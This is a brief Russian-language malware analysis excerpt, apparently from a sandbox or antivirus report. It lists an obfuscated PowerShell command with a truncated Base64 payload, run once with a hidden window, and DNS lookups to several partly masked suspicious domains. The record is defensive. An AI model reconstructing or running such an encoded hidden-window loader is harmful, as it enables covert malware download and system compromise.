Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABWAGMAYgBpAGEAegA9ACcARgAxADgAOQBpAEQAMgAnADsAJABaAGsASQBLAFYAUQBiACAAPQAgACcAOAAzADUAJwA7ACQATQBuAEYAOQByAHAASgBzAD0AJwB3AEEARgBrAF8ARwBBACcAOwAkAFAAUwA1AG0ASABUAHEAPQAkAGUAbgB2ADoAd...
- DNS ASK ba###ild.com
- DNS ASK tr######hcaothainguyen.com
- DNS ASK ye###.ksphome.com
- DNS ASK mo######lonlinepharmacy.com
- DNS ASK ri###sahara.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABWAGMAYgBpAGEAegA9ACcARgAxADgAOQBpAEQAMgAnADsAJABaAGsASQBLAFYAUQBiACAAPQAgACcAOAAzADUAJwA7ACQATQBuAEYAOQByAHAASgBzAD0AJwB3AEEARgBrAF8ARwBBACcAOwAkAFAAUwA1AG0ASABUAHEAPQAkAGUAbgB2ADoAd... (со скрытым окном)